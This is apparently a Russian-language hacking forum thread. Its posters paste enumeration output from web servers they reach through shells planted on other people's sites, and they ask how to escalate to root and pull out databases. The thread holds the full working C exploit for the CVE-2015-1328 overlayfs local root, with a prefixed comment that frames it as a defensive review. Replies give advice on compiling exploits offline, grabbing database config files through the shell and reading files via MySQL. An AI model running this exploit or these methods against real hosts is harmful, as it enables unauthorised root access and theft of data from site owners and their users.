3.8G 16K 3.8G 1% /run/shm none 100M 0 100M 0% /run/user /dev/md1 1.8T 48G 1.7T 3% /opt $ cat /etc/issue 2>&1 Code: Ubuntu 14.04.1 LTS \n \l $ cat /etc/crontab 2>&1 Code: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. 
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # # ClamAV refresh virus databases 30 1 * * * root freshclam >/dev/null 2>&1 # ClamAV checking vhosts directory and sending email to admins 0 2 * * * root /adm/clamav.sh >/dev/null 2>&1 $ ls -la /etc/cron.d 2>&1 Code: total 44 drwxr-xr-x 2 root root 4096 Apr 21 08:16 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rw------- 1 root root 260 Jul 11 2014 awstats -rw-r--r-- 1 root root 1566 Feb 3 2014 mailman -rw-r--r-- 1 root root 589 Feb 28 2014 mdadm -rw-r--r-- 1 root root 510 Jul 7 2014 php5 -rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task -rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller $ ls -la /etc/cron.hourly 2>&1 Code: total 20 drwxr-xr-x 2 root root 4096 Jun 24 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder $ ls -la /etc/cron.monthly 2>&1 Code: total 24 drwxr-xr-x 2 root root 4096 Jul 11 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. -rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly $ ls -la /etc/cron.weekly 2>&1 Code: total 40 drwxr-xr-x 2 root root 4096 Jul 11 2014 . drwxr-xr-x 144 root root 12288 Jul 31 17:59 .. 
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder -rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim -rwxr-xr-x 1 root root 771 Apr 10 2014 man-db -rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common $ cat /proc/version 2>&1 Code: Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 $ cat /proc/sys/vm/mmap_min_addr 2>&1 Code: 65536 $ ls -la /usr/bin/staprun 2>&1 Code: ls: cannot access /usr/bin/staprun: No such file or directory $ pwd 2>&1 Code: /opt/www/vhosts/hostname.domain/logs
Code: /*
 * Reviewer note (defensive reading of the listing that follows).
 *
 * What it is: the public proof-of-concept for CVE-2015-1328. Its own header
 * limits it to Ubuntu 12.04 / 14.04 / 14.10 / 15.04 kernels built before
 * 2015-06-15, so the primary mitigation is running a kernel newer than that.
 * Where overlayfs is not needed, keeping the module from loading, or
 * restricting unprivileged user namespaces, should remove the path the code
 * depends on; confirm against the vendor advisory linked in the header.
 *
 * Observable artifacts, all taken from the code below:
 *   - a scratch tree /tmp/ns_sploit/{work,upper,o} that is created and later
 *     removed with "rm -rf";
 *   - "overlayfs" / "overlay" mounts issued after unshare(CLONE_NEWUSER) and
 *     clone(CLONE_NEWNS), one of them with upperdir=/etc;
 *   - /etc/ld.so.preload being opened O_WRONLY by the unprivileged caller and
 *     then holding the single entry "/tmp/ofs-lib.so";
 *   - gcc started through system() to build /tmp/ofs-lib.so from
 *     /tmp/ofs-lib.c;
 *   - an execl() of /bin/su immediately afterwards.
 *
 * The preloaded getuid() hook in LIB unlinks /etc/ld.so.preload and
 * /tmp/ofs-lib.so once it runs with euid 0 inside /bin/su, so a later file
 * listing will not show them. Detection therefore has to come from audit
 * records (creation of or writes to /etc/ld.so.preload, mount calls made by
 * unprivileged uids, a compiler spawned by a web or service account) rather
 * than from leftover files.
 *
 * The listing is kept exactly as posted (line breaks were lost in the page
 * extraction); no code token is changed.
 */
/* # Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) greets to beist & kaliman 2015-05-24 %rebel% *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" static char 
child_stack[1024*1024]; static int child_exec(void *stuff) { char *file; system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777); fprintf(stderr,"mount #1\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); exit(-1); } file = ".access"; chmod("/tmp/ns_sploit/work/work",0777); } else file = "ns_last_pid"; chdir("/tmp/ns_sploit/o"); rename(file,"ld.so.preload"); chdir("/"); umount("/tmp/ns_sploit/o"); fprintf(stderr,"mount #2\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { exit(-1); } chmod("/tmp/ns_sploit/work/work",0777); } chmod("/tmp/ns_sploit/o/ld.so.preload",0777); umount("/tmp/ns_sploit/o"); } int main(int argc, char **argv) { int status, fd, lib; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; fprintf(stderr,"spawning threads\n"); if((wrapper = fork()) == 0) { if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); if((init = fork()) == 0) { pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); fprintf(stderr,"child threads done\n"); fd = open("/etc/ld.so.preload",O_WRONLY); 
if(fd == -1) { fprintf(stderr,"exploit failed\n"); exit(-1); } fprintf(stderr,"/etc/ld.so.preload created\n"); fprintf(stderr,"creating shared library\n"); lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); if(lib != 0) { fprintf(stderr,"couldn't create dynamic library\n"); exit(-1); } write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); execl("/bin/su","su",NULL); }
uname -a Code: Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i 686 i686 i386 GNU/Linux ls -la /boot Code: total 39154 drwxr-xr-x 5 root root 5120 Apr 8 13:07 . drwxr-xr-x 28 root root 4096 Aug 10 03:00 .. -rw-r--r-- 1 root root 163 Jan 6 2011 .vmlinuz-2.6.18-194.32.1.el5.hmac -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac -rw-r--r-- 1 root root 166 Sep 26 2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma c -rw-r--r-- 1 root root 165 Dec 5 2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac -rw-r--r-- 1 root root 165 Jun 11 2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac -rw-r--r-- 1 root root 161 Sep 17 2014 .vmlinuz-2.6.18-398.el5PAE.hmac -rw-r--r-- 1 root root 161 Apr 7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac -rw-r--r-- 1 root root 971511 Jan 6 2011 System.map-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 967675 Apr 2 2010 System.map-2.6.18-194.el5 -rw-r--r-- 1 root root 993118 Sep 26 2013 System.map-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 993780 Dec 5 2013 System.map-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 993835 Jun 11 2014 System.map-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 993998 Sep 17 2014 System.map-2.6.18-398.el5PAE -rw-r--r-- 1 root root 994152 Apr 7 20:53 System.map-2.6.18-404.el5PAE -rw-r--r-- 1 root root 69598 Jan 6 2011 config-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 69593 Apr 2 2010 config-2.6.18-194.el5 -rw-r--r-- 1 root root 70337 Sep 26 2013 config-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 70357 Dec 5 2013 config-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 70357 Jun 11 2014 config-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 70353 Sep 17 2014 config-2.6.18-398.el5PAE -rw-r--r-- 1 root root 70353 Apr 7 20:53 config-2.6.18-404.el5PAE drwxr-xr-x 2 root root 1024 May 4 2010 extlinux drwxr-xr-x 2 root root 1024 Apr 8 13:07 grub -rw------- 1 root root 2599913 Jan 25 2011 initrd-2.6.18-194.32.1.el5.img -rw------- 1 root root 2569559 Jan 25 2011 initrd-2.6.18-194.el5.img -rw------- 1 root root 2615526 Oct 14 
2013 initrd-2.6.18-348.18.1.el5PAE.img -rw------- 1 root root 2615834 Jan 24 2014 initrd-2.6.18-371.3.1.el5PAE.img -rw------- 1 root root 2616679 Jun 12 2014 initrd-2.6.18-371.9.1.el5PAE.img -rw------- 1 root root 2616919 Dec 2 2014 initrd-2.6.18-398.el5PAE.img -rw------- 1 root root 2616967 Apr 8 13:07 initrd-2.6.18-404.el5PAE.img drwx------ 2 root root 12288 Jan 1 2009 lost+found -rw-r--r-- 1 root root 80032 Mar 12 2009 message -rw-r--r-- 1 root root 111346 Jan 6 2011 symvers-2.6.18-194.32.1.el5.gz -rw-r--r-- 1 root root 110979 Apr 2 2010 symvers-2.6.18-194.el5.gz -rw-r--r-- 1 root root 117369 Sep 26 2013 symvers-2.6.18-348.18.1.el5PAE.gz -rw-r--r-- 1 root root 117471 Dec 5 2013 symvers-2.6.18-371.3.1.el5PAE.gz -rw-r--r-- 1 root root 117487 Jun 11 2014 symvers-2.6.18-371.9.1.el5PAE.gz -rw-r--r-- 1 root root 117549 Sep 17 2014 symvers-2.6.18-398.el5PAE.gz -rw-r--r-- 1 root root 117561 Apr 7 20:53 symvers-2.6.18-404.el5PAE.gz -rw-r--r-- 1 root root 1877108 Jan 6 2011 vmlinuz-2.6.18-194.32.1.el5 -rw-r--r-- 1 root root 1875796 Apr 2 2010 vmlinuz-2.6.18-194.el5 -rw-r--r-- 1 root root 1908212 Sep 26 2013 vmlinuz-2.6.18-348.18.1.el5PAE -rw-r--r-- 1 root root 1909108 Dec 5 2013 vmlinuz-2.6.18-371.3.1.el5PAE -rw-r--r-- 1 root root 1909140 Jun 11 2014 vmlinuz-2.6.18-371.9.1.el5PAE -rw-r--r-- 1 root root 1910164 Sep 17 2014 vmlinuz-2.6.18-398.el5PAE -rw-r--r-- 1 root root 1910324 Apr 7 20:53 vmlinuz-2.6.18-404.el5PAE mount Code: /dev/md3 on / type ext3 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime) /dev/md2 on /boot type ext3 (rw) /dev/md1 on /var type ext3 (rw,noatime) /dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback) tmpfs on /dev/shm type tmpfs (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) df -h Code: Filesystem Size Used Avail Use% Mounted on /dev/md3 15G 6.8G 7.1G 49% / /dev/md4 4.9G 2.6G 2.1G 56% /tmp /dev/md2 
198M 46M 143M 25% /boot /dev/md1 436G 21G 393G 6% /var /dev/md0 417G 135G 260G 35% /hsphere tmpfs 5.9G 0 5.9G 0% /dev/shm cat /etc/issue Code: CentOS release 5.5 (Final Kernel \r on an \m cat /proc/version Code: Linux version 2.6.18-371.3.1.el5PAE ([email protected]) (gcc versio n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013 cat /proc/sys/vm/mmap_min_addr 4096 Использую этот эксполит https://www.exploit-db.com/exploits/10613/ Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750 И вопрос ,я правельный экполит выбрал?? Ешё только учусь.
1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o 2. Нет прав на gcc, компилируйте сплойт на локальной машине. 3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-security/2015/07/23/16
Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте Но он не дает ни заливать файлы ,ни читать http://hkar.ru/D5S3 http://hkar.ru/D5S4 Code: Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux total 34093 drwxr-xr-x 3 root root 400 Aug 11 04:52 . drwxr-xr-x 24 root root 640 Aug 11 04:52 .. -rw------- 1 root root 3391819 Jul 29 14:35 System.map-3.13.0-61-generic -rw-r--r-- 1 root root 1165129 Jul 29 14:35 abi-3.13.0-61-generic -rw-r--r-- 1 root root 165763 Jul 29 14:35 config-3.13.0-61-generic drwxr-xr-x 2 root root 472 Aug 11 04:52 grub -rw-r--r-- 1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic -rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin -rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf -rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin -rw------- 1 root root 5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic При команде lls -la --full-time /lib (64) тишина /dev/sda1 on / type reiserfs (rw,relatime,notail) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) none on /sys/fs/cgroup type tmpfs (rw) none on /sys/fs/fuse/connections type fusectl (rw) none on /sys/kernel/debug type debugfs (rw) none on /sys/kernel/security type securityfs (rw) udev on /dev type devtmpfs (rw,mode=0755) devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620) tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755) none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880) none on /run/shm type tmpfs (rw,nosuid,nodev) none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755) none on /sys/fs/pstore type pstore (rw) /dev/sda2 on /home type reiserfs (rw,relatime) systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd) Filesystem Size Used Avail Use% Mounted on /dev/sda1 9.4G 4.4G 5.0G 47% / none 4.0K 0 4.0K 0% /sys/fs/cgroup udev 3.9G 12K 3.9G 1% /dev 
tmpfs 799M 496K 798M 1% /run none 5.0M 0 5.0M 0% /run/lock none 3.9G 0 3.9G 0% /run/shm none 100M 0 100M 0% /run/user /dev/sda2 141G 51G 90G 37% /home Ubuntu 14.04.3 LTS \n \l # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 65536 /home/ah42713/web/www ls -la /usr/bin/staprun ничего не выводит find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.
Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active Directory. О чём может идти речь?
Есть root доступ в mysql и такой серв Code: :/var/www/user/data $ uname -a Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux :/var/www/user/data $ ls -la /boot total 15161 drwxr-xr-x 4 root root 1024 May 12 13:06 . drwxr-xr-x 23 root root 4096 Jul 30 06:32 .. -rw-r--r-- 1 root root 2114623 Apr 25 03:31 System.map-3.2.0-4-amd64 -rw-r--r-- 1 root root 129281 Apr 25 03:31 config-3.2.0-4-amd64 drwxr-xr-x 3 root root 5120 May 12 13:07 grub -rw-r--r-- 1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64 drwxr-xr-x 2 root root 12288 May 12 13:01 lost+found -rw-r--r-- 1 root root 2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64 :/var/www/user/data $ ls -la --full-time /lib total 264 drwxr-xr-x 13 root root 4096 2015-05-16 00:32:27.064340794 +0300 . drwxr-xr-x 23 root root 4096 2015-07-30 06:32:55.250270001 +0300 .. lrwxrwxrwx 1 root root 21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp drwxr-xr-x 2 root root 4096 2015-05-12 13:05:25.243433001 +0300 discover drwxr-xr-x 7 root root 4096 2015-05-12 13:03:48.463433001 +0300 firmware drwxr-xr-x 2 root root 4096 2015-05-12 13:03:13.543433001 +0300 init -rwxr-xr-x 1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0 -rw-r--r-- 1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0 lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0 -rw-r--r-- 1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0 lrwxrwxrwx 1 root root 15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0 -rw-r--r-- 1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0 lrwxrwxrwx 1 root root 16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0 -rw-r--r-- 1 root root 5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0 lrwxrwxrwx 1 root root 19 
2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0 -rw-r--r-- 1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0 drwxr-xr-x 3 root root 4096 2015-05-12 13:03:13.911433001 +0300 lsb drwxr-xr-x 2 root root 4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d drwxr-xr-x 3 root root 4096 2015-05-12 13:03:59.007433001 +0300 modules drwxr-xr-x 3 root root 4096 2015-05-12 13:03:27.079433001 +0300 systemd drwxr-xr-x 15 root root 4096 2015-05-12 13:03:06.719433001 +0300 terminfo drwxr-xr-x 5 root root 4096 2015-05-12 13:03:27.463433001 +0300 udev drwxr-xr-x 4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu drwxr-xr-x 2 root root 4096 2015-05-12 13:03:24.923433001 +0300 xtables :/var/www/user/data $ mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755) /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpquota) tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k) tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k) /dev/vda1 on /boot type ext2 (rw,relatime,errors=continue) rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime) :/var/www/user/data $ df -h Filesystem Size Used Avail Use% Mounted on rootfs 58G 26G 29G 48% / udev 10M 0 10M 0% /dev tmpfs 585M 232K 585M 1% /run /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 58G 26G 29G 48% / tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1.3G 0 1.3G 0% /run/shm /dev/vda1 89M 17M 67M 21% /boot :/var/www/user/data $ cat /etc/issue Debian GNU/Linux 7 \n \l :/var/www/user/data $ cat /etc/crontab # /etc/crontab: 
system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # :/var/www/user/data $ ls -la /etc/cron.d total 20 drwxr-xr-x 2 root root 4096 Jun 15 13:23 . drwxr-xr-x 93 root root 4096 Aug 28 09:27 .. -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder -rw-r--r-- 1 root root 254 Jun 13 2012 awstats -rw-r--r-- 1 root root 510 Mar 25 10:47 php5 :/var/www/user/data $ ls -la /etc/cron.hourly total 12 drwxr-xr-x 2 root root 4096 May 12 13:03 . drwxr-xr-x 93 root root 4096 Aug 28 09:27 .. -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder :/var/www/user/data $ la -la /etc/cron.monthly sh: 1: la: not found :/var/www/user/data $ la -la /etc/cron.weekly sh: 1: la: not found :/var/www/user/data $ cat /etc/cron.hourly/* cat: /etc/cron.hourly/*: No such file or directory :/var/www/user/data $ cat /etc/cron.monthly/* cat: /etc/cron.monthly/*: No such file or directory :/var/www/user/data $ cat /etc/cron.weekly/* #!/bin/sh # # man-db cron weekly set -e iosched_idle= # Don't try to change I/O priority in a vserver or OpenVZ. if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \ ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)" if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then iosched_idle='--iosched idle' fi fi if ! [ -d /var/cache/man ]; then # Recover from deletion, per FHS. 
mkdir -p /var/cache/man chown man:root /var/cache/man || true chmod 2755 /var/cache/man fi # regenerate man database if [ -x /usr/bin/mandb ]; then # --pidfile /dev/null so it always starts; mandb isn't really a daemon, # but we want to start it like one. start-stop-daemon --start --pidfile /dev/null \ --startas /usr/bin/mandb --oknodo --chuid man \ $iosched_idle \ -- --quiet fi exit 0 #!/bin/sh RKHUNTER=/usr/bin/rkhunter test -x $RKHUNTER || exit 0 # source our config . /etc/default/rkhunter case "$CRON_DB_UPDATE" in [YyTt]*) if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \ [ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx" exit 1 fi OUTFILE=`mktemp` || exit 1 case "$DB_UPDATE_EMAIL" in [YyTt]*) ( echo "Subject: [rkhunter] $(hostname -f) - Weekly database update" echo "To: $REPORT_EMAIL" echo "" $RKHUNTER --versioncheck --nocolors --appendlog $RKHUNTER --update --nocolors --appendlog ) | /usr/sbin/sendmail $REPORT_EMAIL ;; *) $RKHUNTER --versioncheck --appendlog 1>/dev/null 2>$OUTFILE $RKHUNTER --update --appendlog 1>/dev/null 2>>$OUTFILE ;; esac if [ -s "$OUTFILE" ]; then ( echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update" echo "To: $REPORT_EMAIL" echo "" cat $OUTFILE ) | /usr/sbin/sendmail $REPORT_EMAIL fi rm -f $OUTFILE ;; *) exit 0 ;; esac :/var/www/user/data $ cat /proc/version Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1 :/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr 65536 :/var/www/user/data $ pwd /var/www/user/data :/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null :/var/www/user/data $ id uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure) :/var/www/user/data $ пробовал читать файлы из mysql но много не прочитал select load_file(''); И из эксплоитов 
пробовал (чекер показал):
- Kernel ia32syscall Emulation Privilege Escalation Language=c
- Sendpage Local Privilege Escalation Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c
- open-time Capability file_ns_capable() Privilege Escalation Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c
